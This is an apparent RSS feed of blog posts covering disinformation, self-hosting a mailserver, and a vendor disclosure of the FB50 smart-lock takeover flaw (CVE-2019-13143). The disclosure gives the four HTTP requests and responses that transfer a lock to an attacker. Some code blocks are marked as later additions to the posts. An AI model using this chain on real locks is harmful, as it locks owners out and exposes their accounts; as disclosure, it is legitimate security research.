2537Darknet Diaries & Off the Pill. To add to this list, I’ve begun binging Vice’s CYBER.
2538It’s pretty good—each episode is only about 30 mins and it hits the sweet spot,
2539delivering both interesting security content and news.</p>
2540
2541<p>My reading needs a ton of catching up. Hopefully I’ll get around to finishing up
2542“The Unending Game” this week. And then go back to “Terrorism and Counterintelligence”.</p>
2543
2544<p>I’ve begun learning Russian! I’m really liking it so far, and it’s been surprisingly
2545easy to pick up. Learning the Cyrillic script will require some relearning, especially
2546with letters like в, н, р, с, etc. that look like English but sound entirely different.
2547I think I’m pretty serious about learning this language—I’ve added the Russian keyboard
2548to my Google Keyboard to aid in my familiarization of the alphabet. I’ve added the <code>RU</code>
2549layout to my keyboard map too:</p>
2550
2551<pre><code>setxkbmap -option 'grp:alt_shift_toggle' -layout us,ru
2552</code></pre>
2553
2554<p>With that ends my weekly update, and I’ll see you next week!</p>
2555]]></description><link>https://icyphox.sh/blog/2019-09-17</link><pubDate>Tue, 17 Sep 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2019-09-17</guid></item><item><title>Disinformation demystified</title><description><![CDATA[<p>As with the disambiguation of any word, let’s start with its etymology and definition.
2556According to <a href="https://en.wikipedia.org/wiki/Disinformation">Wikipedia</a>,
2557<em>disinformation</em> has been borrowed from the Russian word — <em>dezinformatsiya</em> (дезинформа́ция),
2558derived from the title of a KGB black propaganda department.</p>
2559
2560<blockquote>
2561 <p>Disinformation is false information spread deliberately to deceive.</p>
2562</blockquote>
2563
2564<p>To fully understand disinformation, especially in the modern age, we need to understand the
2565key factors of any successful disinformation operation:</p>
2566
2567<ul>
2568<li>creating disinformation (what)</li>
2569<li>the motivation behind the op, or its end goal (why)</li>
2570<li>the medium used to disperse the falsified information (how)</li>
2571<li>the actor (who)</li>
2572</ul>
2573
2574<p>At the end, we’ll also look at how you can use disinformation techniques to maintain OPSEC.</p>
2575
2576<p>In order to break monotony, I will also be using the terms “information operation”, or the shortened
2577forms—"info op” & “disinfo”.</p>
2578
2579<h2 id="creating-disinformation">Creating disinformation</h2>
2580
2581<p>Crafting or creating disinformation is by no means a trivial task. Often, the quality
2582of any disinformation sample is a huge indicator of the level of sophistication of the
2583actor involved, i.e. is it a 12 year old troll or a nation state?</p>
2584
2585<p>Well-crafted disinformation always has one primary characteristic — “plausibility”.
2586The disinfo must sound reasonable. It must induce the notion it’s <em>likely</em> true.
2587To achieve this, the target — be it an individual, a specific demographic or an entire
2588nation — must be well researched. A deep understanding of the target’s culture, history,
2589geography and psychology is required. It also needs circumstantial and situational awareness
2590of the target.</p>
2591
2592<p>There are many forms of disinformation. A few common ones are staged videos / photographs,
2593recontextualized videos / photographs, blog posts, news articles & most recently — deepfakes.</p>
2594
2595<p>Here’s a tweet from <a href="https://twitter.com/thegrugq">the grugq</a>, showing a case of recontextualized
2596imagery:</p>
2597
2598<blockquote class="twitter-tweet" data-dnt="true" data-theme="dark" data-link-color="#00ffff">
2599<p lang="en" dir="ltr">Disinformation.
2600<br><br>
2601The content of the photo is not fake. The reality of what it captured is fake. The context it’s placed in is fake. The picture itself is 100% authentic. Everything, except the photo itself, is fake.
2602<br><br>Recontextualisation as threat vector.
2603<a href="https://t.co/Pko3f0xkXC">pic.twitter.com/Pko3f0xkXC</a>
2604</p>— thaddeus e. grugq (@thegrugq)
2605<a href="https://twitter.com/thegrugq/status/1142759819020890113?ref_src=twsrc%5Etfw">June 23, 2019</a>
2606</blockquote>
2607
2609
2610<h2 id="motivations-behind-an-information-operation">Motivations behind an information operation</h2>
2611
2612<p>I like to broadly categorize any info op as either proactive or reactive.
2613Proactively, disinformation is spread with the desire to influence the target
2614either before or during the occurrence of an event. This is especially observed
2615during elections.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup>
2616In offensive information operations, the target’s psychological state can be affected by
2617spreading <strong>fear, uncertainty & doubt</strong>, or FUD for short.</p>
2618
2619<p>Reactive disinformation is when the actor, usually a nation state in this case,
2620screws up and wants to cover their tracks. A fitting example of this is the case
2621of Malaysian Airlines Flight 17 (MH17), which was shot down while flying over
2622eastern Ukraine. This tragic incident has been attributed to Russian-backed
2623separatists.<sup class="footnote-ref" id="fnref-2"><a href="#fn-2">2</a></sup>
2624Russian media is known to have disseminated a number of alternative & some even
2625conspiratorial theories<sup class="footnote-ref" id="fnref-3"><a href="#fn-3">3</a></sup>, in response. The number grew as the JIT’s (Dutch-led Joint
2626Investigation Team) investigations pointed towards the separatists.
2627The idea was to <strong>muddle the information</strong> space with these theories, and as a result,
2628potentially correct information takes a credibility hit.</p>
2629
2630<p>Another motive for an info op is to <strong>control the narrative</strong>. This is often seen in use
2631in totalitarian regimes; when the government decides what the media portrays to the
2632masses. The ongoing Hong Kong protests are a good example.<sup class="footnote-ref" id="fnref-4"><a href="#fn-4">4</a></sup> According to <a href="https://www.npr.org/2019/08/14/751039100/china-state-media-present-distorted-version-of-hong-kong-protests">NPR</a>:</p>
2633
2634<blockquote>
2635 <p>Official state media pin the blame for protests on the “black hand” of foreign interference,
2636 namely from the United States, and what they have called criminal Hong Kong thugs.
2637 A popular conspiracy theory posits the CIA incited and funded the Hong Kong protesters,
2638 who are demanding an end to an extradition bill with China and the ability to elect their own leader.
2639 Fueling this theory, China Daily, a state newspaper geared toward a younger, more cosmopolitan audience,
2640 this week linked to a video purportedly showing Hong Kong protesters using American-made grenade launchers to combat police.
2641 …</p>
2642</blockquote>
2643
2644<h2 id="media-used-to-disperse-disinfo">Media used to disperse disinfo</h2>
2645
2646<p>As seen in the above example of totalitarian governments, national TV and newspaper agencies
2647play a key role in influence ops en masse. It guarantees outreach due to the channel/paper’s
2648popularity.</p>
2649
2650<p>Twitter is another, obvious example. Due to the ease of creating accounts and the ability to
2651generate activity programmatically via the API, Twitter bots are the go-to choice today for
2652info ops. Essentially, an actor attempts to create “discussions” amongst “users” (read: bots),
2653to push their narrative(s). Twitter also provides analytics for every tweet, enabling actors to
2654get realtime insights into what sticks and what doesn’t.
2655The use of Twitter was seen during the previously discussed MH17 case, where Russia employed its troll
2656factory — the <a href="https://en.wikipedia.org/wiki/Internet_Research_Agency">Internet Research Agency</a> (IRA)
2657to create discussions about alternative theories.</p>
2658
2659<p>In India, disinformation is often spread via YouTube, WhatsApp and Facebook. Political parties
2660actively invest in creating group chats to spread political messages and memes. These parties
2661have volunteers whose sole job is to sit and forward messages.
2662Apart from political propaganda, WhatsApp finds itself as a medium of fake news. In most cases,
2663this is disinformation without a motive, or the motive is hard to determine simply because
2664the source is impossible to trace, lost in forwards.<sup class="footnote-ref" id="fnref-5"><a href="#fn-5">5</a></sup>
2665This is a difficult problem to combat, especially given the nature of the target audience.</p>
2666
2667<h2 id="the-actors-behind-disinfo-campaigns">The actors behind disinfo campaigns</h2>
2668
2669<p>I doubt this requires further elaboration, but in short:</p>
2670
2671<ul>
2672<li>nation states and their intelligence agencies</li>
2673<li>governments, political parties</li>
2674<li>other non/quasi-governmental groups</li>
2675<li>trolls</li>
2676</ul>
2677
2678<p>This essentially sums up the what, why, how and who of disinformation. </p>
2679
2680<h2 id="personal-opsec">Personal OPSEC</h2>
2681
2682<p>This is a fun one. Now, it’s common knowledge that
2683<strong>STFU is the best policy</strong>. But sometimes, this might not be possible, because
2684after all, inactivity leads to suspicion, and suspicion leads to scrutiny. Which might
2685lead to your OPSEC being compromised.
2686So if you really have to, you can feign activity using disinformation. For example,
2687pick a place, and throw in subtle details pertaining to the weather, local events
2688or regional politics of that place into your disinfo. Assuming this is Twitter, you can
2689tweet stuff like:</p>
2690
2691<ul>
2692<li>“Ugh, when will this hot streak end?!”</li>
2693<li>“Traffic wonky because of the Mardi Gras parade.”</li>
2694<li>“Woah, XYZ place is nice! Especially the fountains by ABC street.”</li>
2695</ul>
2696
2697<p>Of course, if you’re a nobody on Twitter (like me), this is a non-issue for you.</p>
2698
2699<p>And please, don’t do this:</p>
2700
2701<p><img src="/static/img/mcafeetweet.png" alt="mcafee opsecfail" /></p>
2702
2703<h2 id="conclusion">Conclusion</h2>
2704
2705<p>The ability to influence someone’s decisions/thought process in just one tweet is
2706scary. There is no simple way to combat disinformation. Social media is hard to control.
2707Just like anything else in cyber, this too is an endless battle between social media corps
2708and motivated actors.</p>
2709
2710<p>A huge shoutout to Bellingcat for their extensive research in this field, and for helping
2711folks see the truth in a post-truth world.</p>
2712
2713<div class="footnotes">
2714<hr />
2715<ol>
2716<li id="fn-1">
2717<p><a href="https://www.vice.com/en_us/article/ev3zmk/an-expert-explains-the-many-ways-our-elections-can-be-hacked">This</a> episode of CYBER talks about election influence ops (features the grugq!). <a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
2718</li>
2719
2720<li id="fn-2">
2721<p>The <a href="https://www.bellingcat.com/category/resources/podcasts/">Bellingcat Podcast</a>’s season one covers the MH17 investigation in detail. <a href="#fnref-2" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
2722</li>
2723
2724<li id="fn-3">
2725<p><a href="https://en.wikipedia.org/wiki/Malaysia_Airlines_Flight_17#Conspiracy_theories">Wikipedia section on MH17 conspiracy theories</a> <a href="#fnref-3" class="footnoteBackLink" title="Jump back to footnote 3 in the text.">↩</a></p>
2726</li>
2727
2728<li id="fn-4">
2729<p><a href="https://twitter.com/gdead/status/1171032265629032450">Chinese newspaper spreading disinfo</a> <a href="#fnref-4" class="footnoteBackLink" title="Jump back to footnote 4 in the text.">↩</a></p>
2730</li>
2731
2732<li id="fn-5">
2733<p>Use an adblocker before clicking <a href="https://www.news18.com/news/tech/fake-whatsapp-message-of-child-kidnaps-causing-mob-violence-in-madhya-pradesh-2252015.html">this</a>. <a href="#fnref-5" class="footnoteBackLink" title="Jump back to footnote 5 in the text.">↩</a></p>
2734</li>
2735</ol>
2736</div>
2737]]></description><link>https://icyphox.sh/blog/disinfo</link><pubDate>Tue, 10 Sep 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/disinfo</guid></item><item><title>Setting up my personal mailserver</title><description><![CDATA[<p>A mailserver was a long time coming. I’d made an attempt at setting one up
2738around ~4 years ago (ish), and IIRC, I quit when it came to DNS. And
2739I almost did this time too.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup></p>
2740
2741<p>For this attempt, I wanted a simpler approach. I recall how terribly
2742confusing Dovecot & Postfix were to configure and hence I decided to look
2743for a containerized solution, that most importantly, runs on my cheap $5
2744Digital Ocean VPS — 1 vCPU and 1 GB memory. Of which only around 500 MB
2745is actually available. So yeah, <em>pretty</em> tight.</p>
2746
2747<h2 id="whats-available">What’s available</h2>
2748
2749<p>Turns out, there are quite a few of these OOTB, ready-to-deploy solutions.
2750These are the ones I came across:</p>
2751
2752<ul>
2753<li><p><a href="https://poste.io">poste.io</a>: Based on an “open core” model. The base install is open source
2754and free (as in beer), but you’ll have to pay for the extra stuff.</p></li>
2755<li><p><a href="https://mailu.io">mailu.io</a>: Free software. Draws inspiration from poste.io,
2756but ships with a web UI that I didn’t need. </p></li>
2757<li><p><a href="https://mailcow.email">mailcow.email</a>: These fancy domains are getting ridiculous. But more importantly
2758they need 2 GiB of RAM <em>plus</em> swap?! Nope.</p></li>
2759<li><p><a href="https://mailinabox.email">Mail-in-a-Box</a>: Unlike the ones above, not a Docker-based solution but definitely worth
2760a mention. It however, needs a fresh box to work with. A box with absolutely
2761nothing else on it. I can’t afford to do that.</p></li>
2762<li><p><a href="https://github.com/tomav/docker-mailserver/">docker-mailserver</a>: <strong>The winner</strong>. </p></li>
2763</ul>
2764
2765<h2 id="so-docker-mailserver">So… <code>docker-mailserver</code></h2>
2766
2767<p>The first thing that caught my eye in the README:</p>
2768
2769<blockquote>
2770 <p>Recommended:</p>
2771
2772 <ul>
2773 <li>1 CPU</li>
2774 <li>1GB RAM</li>
2775 </ul>
2776
2777 <p>Minimum:</p>
2778
2779 <ul>
2780 <li>1 CPU</li>
2781 <li>512MB RAM</li>
2782 </ul>
2783</blockquote>
2784
2785<p>Fantastic, I can somehow squeeze this into my existing VPS.
2786Setup was fairly simple & the docs are pretty good. It employs a single
2787<code>.env</code> file for configuration, which is great.
2788However, I did run into a couple of hiccups here and there.</p>
2789
2790<p>One especially nasty one was <code>docker</code> / <code>docker-compose</code> running out
2791of memory.</p>
2792
2793<pre><code>Error response from daemon: cannot stop container: 2377e5c0b456: Cannot kill container 2377e5c0b456226ecaa66a5ac18071fc5885b8a9912feeefb07593638b9a40d1: OCI runtime state failed: runc did not terminate sucessfully: fatal error: runtime: out of memory
2794</code></pre>
2795
2796<p>But it eventually worked after a couple of attempts.</p>
2797
2798<p>The next thing I struggled with — DNS. Specifically, with the step where
2799the DKIM keys are generated<sup class="footnote-ref" id="fnref-2"><a href="#fn-2">2</a></sup>. The output under <br />
2800<code>config/opendkim/keys/domain.tld/mail.txt</code> <br />
2801isn’t exactly CloudFlare-friendly; it can’t be directly copy-pasted into
2802a <code>TXT</code> record.</p>
2803
2804<p>This is what it looks like.</p>
2805
2806<pre><code>mail._domainkey IN TXT ( "v=DKIM1; h=sha256; k=rsa; "
2807 "p=<key>"
2808 "<more key>" ) ; ----- DKIM key mail for icyphox.sh
2809</code></pre>
2810
2811<p>But while configuring the record, you set “Type” to <code>TXT</code>, “Name” to <code>mail._domainkey</code>,
2812and the “Value” to what’s inside the parenthesis <code>( )</code>, <em>removing</em> the quotes <code>""</code>.
2813Also remove the part that appears to be a comment <code>; ----- ...</code>.</p>
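<p>As an added example (not part of the original post, nor of docker-mailserver), here is a small Python script that does that conversion mechanically: it reads a BIND-style <code>mail.txt</code> record, drops the trailing <code>; -----</code> comment without touching the <code>;</code> separators inside the value, joins the quoted strings into the single string the DNS form wants, and checks that the result still carries a non-empty <code>p=</code> key. The record text below is a constructed sample with placeholder key material.</p>

```python
import re

# Constructed sample in the shape of docker-mailserver's
# config/opendkim/keys/domain.tld/mail.txt; the key material is a placeholder,
# not a real DKIM public key.
SAMPLE_MAIL_TXT = (
    'mail._domainkey IN TXT ( "v=DKIM1; h=sha256; k=rsa; "\n'
    '  "p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAplaceholderpart1"\n'
    '  "placeholderpart2IDAQAB" ) ; ----- DKIM key mail for example.com\n'
)


def strip_zone_comment(record: str) -> str:
    """Drop a trailing zone-file comment (a ';' outside quotes).

    A plain str.split(';') would be wrong here: the DKIM value itself is a
    ';'-separated tag list, so only a ';' outside the quoted strings starts
    a comment.
    """
    kept = []
    in_quotes = False
    for ch in record:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == ";" and not in_quotes:
            break
        kept.append(ch)
    return "".join(kept)


def parse_bind_txt(record: str) -> tuple[str, str]:
    """Return (owner name, TXT value) for a BIND-style TXT record.

    BIND writes long TXT data as several quoted strings inside ( ... );
    the actual DNS value is their concatenation, without the quotes.
    A single-string record without parentheses is accepted too.
    """
    body = strip_zone_comment(record)
    m = re.match(r"^\s*(\S+)\s+(?:\d+\s+)?(?:IN\s+)?TXT\b(.*)$", body, re.S)
    if not m:
        raise ValueError("not a TXT record: %r" % record[:40])
    strings = re.findall(r'"([^"]*)"', m.group(2))
    if not strings:
        raise ValueError("TXT record has no quoted data")
    return m.group(1), "".join(strings)


def dkim_tags(value: str) -> dict[str, str]:
    """Split a DKIM key record ('v=DKIM1; k=rsa; p=...') into a tag dict."""
    tags = {}
    for part in value.split(";"):
        part = part.strip()
        if part:
            key, _, val = part.partition("=")
            tags[key.strip()] = val.strip()
    return tags


def cloudflare_value(record: str) -> tuple[str, str]:
    """Produce the (Name, Value) pair to paste into the DNS provider's form.

    Besides joining the strings, sanity-check the key record: a 'v' tag, if
    present, must be DKIM1, and an empty 'p' tag means a revoked key, which
    would make every message signed with it fail verification.
    """
    name, value = parse_bind_txt(record)
    tags = dkim_tags(value)
    if tags.get("v", "DKIM1") != "DKIM1":
        raise ValueError("unexpected DKIM version: %r" % tags["v"])
    if not tags.get("p"):
        raise ValueError("empty p= tag: this record would revoke the key")
    return name, value


if __name__ == "__main__":
    name, value = cloudflare_value(SAMPLE_MAIL_TXT)
    print("Type:  TXT")
    print("Name: ", name)
    print("Value:", value)
```

The printed Name/Value pair is what goes into the provider's form; the owner name stays relative (<code>mail._domainkey</code>), the provider appends the zone.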
2814
2815<p>To simplify debugging DNS issues later, it’s probably a good idea to
2816point to your mailserver using a subdomain like <code>mail.domain.tld</code> using an
2817<code>A</code> record.
2818You’ll then have to set an <code>MX</code> record with the “Name” as <code>@</code> (or whatever your DNS provider
2819uses to denote the root domain) and the “Value” to <code>mail.domain.tld</code>.
2820And finally, the <code>PTR</code> (pointer record, I think), which is the reverse of
2821your <code>A</code> record — “Name” as the server IP and “Value” as <code>mail.domain.tld</code>.
2822I learnt this part the hard way, when my outgoing email kept getting
2823rejected by Tutanota’s servers.</p>
2824
2825<p>Yet another hurdle — SSL/TLS certificates. This isn’t very properly
2826documented, unless you read through the <a href="https://github.com/tomav/docker-mailserver/wiki/Installation-Examples">wiki</a>
2827and look at an example. In short, install <code>certbot</code>, have port 80 free,
2828and run </p>
2829
2830<div class="codehilite"><pre><span></span><code>$ certbot certonly --standalone -d mail.domain.tld
2831</code></pre></div>
2832
2833<p>Once that’s done, edit the <code>docker-compose.yml</code> file to mount <code>/etc/letsencrypt</code> in
2834the container, something like so:</p>
2835
2836<div class="codehilite"><pre><span></span><code><span class="nn">...</span>
2837
2838<span class="nt">volumes</span><span class="p">:</span>
2839 <span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">maildata:/var/mail</span>
2840 <span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">mailstate:/var/mail-state</span>
2841 <span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">./config/:/tmp/docker-mailserver/</span>
2842 <span class="p p-Indicator">-</span> <span class="l l-Scalar l-Scalar-Plain">/etc/letsencrypt:/etc/letsencrypt</span>
2843
2844<span class="nn">...</span>
2845</code></pre></div>
2846
2847<p>With this done, you shouldn’t have mail clients complaining about
2848wonky certs for which you’ll have to add an exception manually.</p>
2849
2850<h2 id="why-would-you">Why would you…?</h2>
2851
2852<p>There are a few good reasons for this:</p>
2853
2854<h3 id="privacy">Privacy</h3>
2855
2856<p>No really, this is <em>the</em> best choice for truly private
2857email. Not ProtonMail, not Tutanota. Sure, they claim so and I don’t
2858dispute it. Quoting Drew Devault<sup class="footnote-ref" id="fnref-3"><a href="#fn-3">3</a></sup>,</p>
2859
2860<blockquote>
2861 <p>Truly secure systems do not require you to trust the service provider.</p>
2862</blockquote>
2863
2864<p>But you have to <em>trust</em> ProtonMail. They run open source software, but
2865how can you really be sure that it isn’t a backdoored version of it?</p>
2866
2867<p>When you host your own mailserver, you truly own your email without having to rely on any
2868third-party.
2869This isn’t an attempt to spread FUD. In the end, it all depends on your
2870threat model™.</p>
2871
2872<h3 id="decentralization">Decentralization</h3>
2873
2874<p>Email today is basically run by Google. Gmail has over 1.2 <em>billion</em>
2875active users. That’s obscene.
2876Email was designed to be decentralized but big corps swooped in and
2877made it a product. They now control your data, and it isn’t unknown that
2878Google reads your mail. This again loops back to my previous point, privacy.
2879Decentralization guarantees privacy. When you control your mail, you subsequently
2880control who reads it.</p>
2881
2882<h3 id="personalization">Personalization</h3>
2883
2884<p>Can’t ignore this one. It’s cool to have a custom email address to flex.</p>
2885
2886<p><code>x@icyphox.sh</code> vs <code>gabe.newell4321@gmail.com</code></p>
2887
2888<p>Pfft, this is no competition.</p>
2889
2890<div class="footnotes">
2891<hr />
2892<ol>
2893<li id="fn-1">
2894<p>My <a href="https://twitter.com/icyphox/status/1161648321548566528">tweet</a> of frustration. <a href="#fnref-1" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
2895</li>
2896
2897<li id="fn-2">
2898<p><a href="https://github.com/tomav/docker-mailserver#generate-dkim-keys">Link</a> to step in the docs. <a href="#fnref-2" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
2899</li>
2900
2901<li id="fn-3">
2902<p>From his <a href="https://drewdevault.com/2018/08/08/Signal.html">article</a> on why he doesn’t trust Signal. <a href="#fnref-3" class="footnoteBackLink" title="Jump back to footnote 3 in the text.">↩</a></p>
2903</li>
2904</ol>
2905</div>
2906]]></description><link>https://icyphox.sh/blog/mailserver</link><pubDate>Thu, 15 Aug 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/mailserver</guid></item><item><title>Picking the FB50 smart lock (CVE-2019-13143)</title><description><![CDATA[<p>(<em>originally posted at <a href="http://blog.securelayer7.net/fb50-smart-lock-vulnerability-disclosure">SecureLayer7’s Blog</a>, with my edits</em>)</p>
2907
2908<h2 id="the-lock">The lock</h2>
2909
2910<p>The lock in question is the FB50 smart lock, manufactured by Shenzhen
2911Dragon Brother Technology Co. Ltd. This lock is sold under multiple brands
2912across many ecommerce sites, and has an estimated 15k+ users.</p>
2913
2914<p>The lock pairs to a phone via Bluetooth, and requires the OKLOK app from
2915the Play/App Store to function. The app requires the user to create an
2916account before further functionality is available.
2917It also facilitates configuring the fingerprint,
2918and unlocking from a range via Bluetooth.</p>
2919
2920<p>We had two primary attack surfaces we decided to tackle—Bluetooth (BLE)
2921and the Android app.</p>
2922
2923<h2 id="via-bluetooth-low-energy-ble">Via Bluetooth Low Energy (BLE)</h2>
2924
2925<p>Android phones have the ability to capture Bluetooth (HCI) traffic
2926which can be enabled under Developer Options under Settings. We made
2927around 4 “unlocks” from the Android phone, as seen in the screenshot.</p>
2928
2929<p><img src="/static/img/bt_wireshark.png" alt="wireshark packets" /></p>
2930
2931<p>This is the value sent in the <code>Write</code> request:</p>
2932
2933<p><img src="/static/img/bt_ws_value.png" alt="wireshark write req" /></p>
2934
2935<p>We attempted replaying these requests using <code>gatttool</code> and <code>gattacker</code>,
2936but that didn’t pan out, since the value being written was encrypted.<sup class="footnote-ref" id="fnref-1"><a href="#fn-1">1</a></sup></p>
2937
2938<h2 id="via-the-android-app">Via the Android app</h2>
2939
2940<p>Reversing the app using <code>jd-gui</code>, <code>apktool</code> and <code>dex2jar</code> didn’t get us too
2941far since most of it was obfuscated. Why bother when there exists an
2942easier approach—BurpSuite.</p>
2943
2944<p>We captured and played around with a bunch of requests and responses,
2945and finally arrived at a working exploit chain.</p>
2946
2947<h2 id="the-exploit">The exploit</h2>
2948
2949<p>The entire exploit is a 4-step process consisting of authenticated
2950HTTP requests:</p>
2951
2952<ol>
2953<li>Using the lock’s MAC (obtained via a simple Bluetooth scan in the
2954vicinity), get the barcode and lock ID</li>
2955<li>Using the barcode, fetch the user ID</li>
2956<li>Using the lock ID and user ID, unbind the user from the lock</li>
2957<li>Provide a new name, attacker’s user ID and the MAC to bind the attacker
2958to the lock</li>
2959</ol>
2960
2961<p>This is what it looks like, in essence (personal info redacted).</p>
2962
2963<h3 id="request-1">Request 1</h3>
2964
2965<pre><code>POST /oklock/lock/queryDevice
2966{"mac":"XX:XX:XX:XX:XX:XX"}
2967</code></pre>
2968
2969<p>Response:</p>
2970
2971<pre><code>{
2972 "result":{
2973 "alarm":0,
2974 "barcode":"<BARCODE>",
2975 "chipType":"1",
2976 "createAt":"2019-05-14 09:32:23.0",
2977 "deviceId":"",
2978 "electricity":"95",
2979 "firmwareVersion":"2.3",
2980 "gsmVersion":"",
2981 "id":<LOCK ID>,
2982 "isLock":0,
2983 "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
2984 "lockPwd":"000000",
2985 "mac":"XX:XX:XX:XX:XX:XX",
2986 "name":"lock",
2987 "radioName":"BlueFPL",
2988 "type":0
2989 },
2990 "status":"2000"
2991}
2992</code></pre>
2993
2994<h3 id="request-2">Request 2</h3>
2995
2996<pre><code>POST /oklock/lock/getDeviceInfo
2997
2998{"barcode":"https://app.oklok.com.cn/app.html?id=<BARCODE>"}
2999</code></pre>
3000
3001<p>Response:</p>
3002
3003<pre><code> "result":{
3004 "account":"email@some.website",
3005 "alarm":0,
3006 "barcode":"<BARCODE>",
3007 "chipType":"1",
3008 "createAt":"2019-05-14 09:32:23.0",
3009 "deviceId":"",
3010 "electricity":"95",
3011 "firmwareVersion":"2.3",
3012 "gsmVersion":"",
3013 "id":<LOCK ID>,
3014 "isLock":0,
3015 "lockKey":"69,59,58,0,26,6,67,90,73,46,20,84,31,82,42,95",
3016 "lockPwd":"000000",
3017 "mac":"XX:XX:XX:XX:XX:XX",
3018 "name":"lock",
3019 "radioName":"BlueFPL",
3020 "type":0,
3021 "userId":<USER ID>
3022 }
3023</code></pre>
3024
3025<h3 id="request-3">Request 3</h3>
3026
3027<pre><code>POST /oklock/lock/unbind
3028
3029{"lockId":"<LOCK ID>","userId":<USER ID>}
3030</code></pre>
3031
3032<h3 id="request-4">Request 4</h3>
3033
3034<pre><code>POST /oklock/lock/bind
3035
3036{"name":"newname","userId":<USER ID>,"mac":"XX:XX:XX:XX:XX:XX"}
3037</code></pre>
3038
3039<h2 id="thats-it-the-scary-stuff">That’s it! (& the scary stuff)</h2>
3040
3041<p>You should have the lock transferred to your account. The severity of this
3042issue lies in the fact that the original owner completely loses access to
3043their lock. They can’t even “rebind” to get it back, since the current owner
3044(the attacker) needs to authorize that.</p>
3045
3046<p>To add to that, the details of roughly 15,000 user accounts are exposed via IDOR
3047(the <code>getDeviceInfo</code> response above returns the owner’s account and user ID
3048for any barcode). Ilja, a cool dude I met on Telegram, noticed locks named “carlock”,
3049“garage”, “MainDoor”, etc.<sup class="footnote-ref" id="fnref-2"><a href="#fn-2">2</a></sup> This is terrifying.</p>
3049
3050<p><em>shudders</em></p>
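<p>What the server-side fix looks like, as an added example: a hypothetical stand-in for the vendor’s lock API (not OKLOK’s code; the endpoint shapes and user IDs are assumed) that replays the four-step chain against a constructed lock, with and without the ownership check that requests 2–4 were missing.</p>

```python
from dataclasses import dataclass, field
from typing import Dict, Optional

# Hypothetical stand-in for the lock vendor's backend, added to show the
# ownership check whose absence makes requests 2-4 work for anyone holding
# a valid account. Not OKLOK's code; the API shape is assumed.


class Forbidden(Exception):
    """The authenticated caller is not allowed to act on this lock."""


@dataclass
class Lock:
    lock_id: int
    mac: str
    owner_id: Optional[int] = None   # userId currently bound, None if unbound
    name: str = "lock"


@dataclass
class LockService:
    locks: Dict[int, Lock] = field(default_factory=dict)
    enforce_ownership: bool = True   # False reproduces the reported behaviour

    def _lock(self, lock_id: int) -> Lock:
        if lock_id not in self.locks:
            raise LookupError("unknown lock")
        return self.locks[lock_id]

    def _require_owner(self, lock: Lock, caller_id: int) -> None:
        # The missing check: being logged in is not the same as owning the lock.
        if self.enforce_ownership and lock.owner_id != caller_id:
            raise Forbidden("caller is not bound to this lock")

    def get_device_info(self, caller_id: int, lock_id: int) -> dict:
        """Request 2: without the owner check this leaks the owner's userId (IDOR)."""
        lock = self._lock(lock_id)
        self._require_owner(lock, caller_id)
        return {"id": lock.lock_id, "mac": lock.mac, "userId": lock.owner_id}

    def unbind(self, caller_id: int, lock_id: int, user_id: int) -> None:
        """Request 3: only the bound user may remove themselves from the lock."""
        lock = self._lock(lock_id)
        self._require_owner(lock, caller_id)
        if lock.owner_id != user_id:
            raise Forbidden("userId does not match the bound user")
        lock.owner_id = None

    def bind(self, caller_id: int, mac: str, user_id: int, name: str) -> None:
        """Request 4: a caller may only bind themselves, and only to a free lock."""
        lock = next((lk for lk in self.locks.values() if lk.mac == mac), None)
        if lock is None:
            raise LookupError("unknown lock")
        if user_id != caller_id:
            raise Forbidden("cannot bind another user")
        if lock.owner_id not in (None, caller_id):
            raise Forbidden("lock is bound to someone else")
        lock.owner_id, lock.name = user_id, name


def takeover_succeeds(enforce_ownership: bool) -> bool:
    """Replay the chain from the post against a constructed lock: True if the
    caller (user 200) ends up as the bound user of user 100's lock."""
    svc = LockService(enforce_ownership=enforce_ownership)
    mac = "XX:XX:XX:XX:XX:XX"                     # placeholder, as in the post
    svc.locks[1] = Lock(lock_id=1, mac=mac, owner_id=100)
    caller = 200
    try:
        victim = svc.get_device_info(caller, 1)["userId"]   # request 2
        svc.unbind(caller, 1, victim)                       # request 3
        svc.bind(caller, mac, caller, "newname")            # request 4
    except Forbidden:
        return False
    return svc.locks[1].owner_id == caller
```

With <code>enforce_ownership=False</code> the chain transfers the lock exactly as described above; with the check in place it stops at request 2.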
3051
3052<h2 id="proof-of-concept">Proof of Concept</h2>
3053
3054<p><a href="https://twitter.com/icyphox/status/1158396372778807296">PoC Video</a></p>
3055
3056<p><a href="https://github.com/icyphox/pwnfb50">Exploit code</a></p>
3057
3058<h2 id="disclosure-timeline">Disclosure timeline</h2>
3059
3060<ul>
3061<li><strong>26th June, 2019</strong>: Issue discovered at SecureLayer7, Pune</li>
3062<li><strong>27th June, 2019</strong>: Vendor notified about the issue</li>
3063<li><strong>2nd July, 2019</strong>: CVE-2019-13143 reserved</li>
3064<li>No response from vendor</li>
3065<li><strong>2nd August 2019</strong>: Public disclosure</li>
3066</ul>
3067
3068<h2 id="lessons-learnt">Lessons learnt</h2>
3069
3070<p><strong>DO NOT</strong>. Ever. Buy. A smart lock. You’re better off with the “dumb” ones
3071with keys. With the IoT plague spreading, it brings in a large attack surface
3072to things that were otherwise “unhackable” (try hacking a “dumb” toaster).</p>
3073
3074<p>The IoT security scene is rife with bugs from over 10 years ago, like
3075executable stack segments<sup class="footnote-ref" id="fnref-3"><a href="#fn-3">3</a></sup>, hardcoded keys, and poor development
3076practices in general.</p>
3077
3078<p>Our existing threat models and scenarios have to be updated to factor
3079in these new exploitation possibilities. This also broadens the playing
3080field for cyber warfare and mass surveillance campaigns.</p>
3081
3082<h2 id="researcher-info">Researcher info</h2>
3083
